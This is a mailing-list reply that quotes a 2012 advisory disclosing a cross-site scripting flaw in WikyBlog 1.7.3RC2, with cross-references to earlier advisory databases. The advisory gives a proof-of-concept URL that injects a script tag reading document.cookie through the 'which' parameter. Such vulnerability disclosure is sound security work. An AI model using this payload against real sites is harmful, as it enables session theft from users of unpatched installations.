This seems to be same issue as http://secunia.com/advisories/38699/ / http://osvdb.org/show/osvdb/62558

I created item about this case to their sf issue tracker: https://sourceforge.net/tracker/?func=detail&aid=3507681&group_id=148518
&atid=771904

- Henri Salo

On Thu, Mar 15, 2012 at 05:31:41PM +0000, sschurtz (at) darksecurity (dot) de [email concealed] wrote:
> Advisory: WikyBlog 1.7.3RC2 XSS vulnerability
> Advisory ID: SSCHADV2012-006
> Author: Stefan Schurtz
> Affected Software: Successfully tested on WikyBlog 1.7.3RC2
> Vendor URL: http://www.wikyblog.com/
> Vendor Status: informed
>
> ==========================
> Vulnerability Description
> ==========================
>
> WikyBlog 1.7.3RC2 is prone to a XSS vulnerability
>
> ==================
> PoC-Exploit
> ==================
>
> http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=c
opy&which='"<script>alert(document.cookie)</script>
>
> =========
> Solution
> =========
>
> -
>
> ====================
> Disclosure Timeline
> ====================
>
> 25-Feb-2012 - vendor informed
> 15-Mar-2012 - no response from vendor
>
> ========
> Credits
> ========
>
> Vulnerability found and advisory written by Stefan Schurtz.
>
> ===========
> References
> ===========
>
> http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt

[ reply ]